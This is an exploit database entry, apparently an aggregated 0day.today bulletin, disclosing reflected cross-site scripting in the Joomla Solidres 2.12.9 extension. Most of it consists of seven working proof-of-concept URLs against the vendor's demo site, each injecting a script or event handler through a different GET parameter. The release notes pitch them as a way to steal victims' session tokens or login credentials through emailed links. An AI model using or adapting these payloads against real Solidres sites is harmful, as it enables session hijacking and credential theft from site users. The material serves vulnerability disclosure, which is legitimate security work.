DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-38025", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Joomla Solidres 2.12.9 Cross Site Scripting Vulnerability", "description": "", "published": "2022-10-05T00:00:00", "modified": "2022-10-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/38025", "reporter": "CraCkEr", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-10-05T06:27:34", "viewCount": 110, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "vulnersScore": -0.3}, "_state": {"dependencies": 1664951717, "score": 1664951901, "epss": 1679305952}, "_internal": {"score_hash": "835c1b6a7e3c7317c637411f29ae408f"}, "sourceHref": "https://0day.today/exploit/38025", "sourceData": "\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u250c\u2518 [ Exploits ] \u250c\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518\n: Author : CraCkEr :\n\u2502 Website : extensions.joomla.org \u2502\n\u2502 Vendor : Solidres Team \u2502\n\u2502 Software : Joomla Solidres 2.12.9 \u2502\n\u2502 Vuln Type: Reflected XSS \u2502\n\u2502 Method : GET \u2502\n\u2502 Impact : Manipulate the content of the site \u2502\n\u2502 \u2502\n\u2502\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518\n: :\n\u2502 Release Notes: \u2502\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502\n\u2502 The attacker can send to victim a link containing a malicious URL in an email or \u2502\n\u2502 instant message can perform a wide variety of actions, such as stealing the victim's \u2502\n\u2502 session token or login credentials \u2502\n\u2502 \u2502\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u250c\u2518 \u250c\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518\n\nGreets:\n\n The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL \n \n CryptoJob (Twitter) twitter.com/CryptozJob\n \n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518\n\n\n\nGET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&\n\n\nGET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n\n\nGET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n\n\nGET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n\n\nGET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n\n\nGET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n\n\nGET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations\n\nhttps://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc\n", "category": "web applications", "verified": true}

{}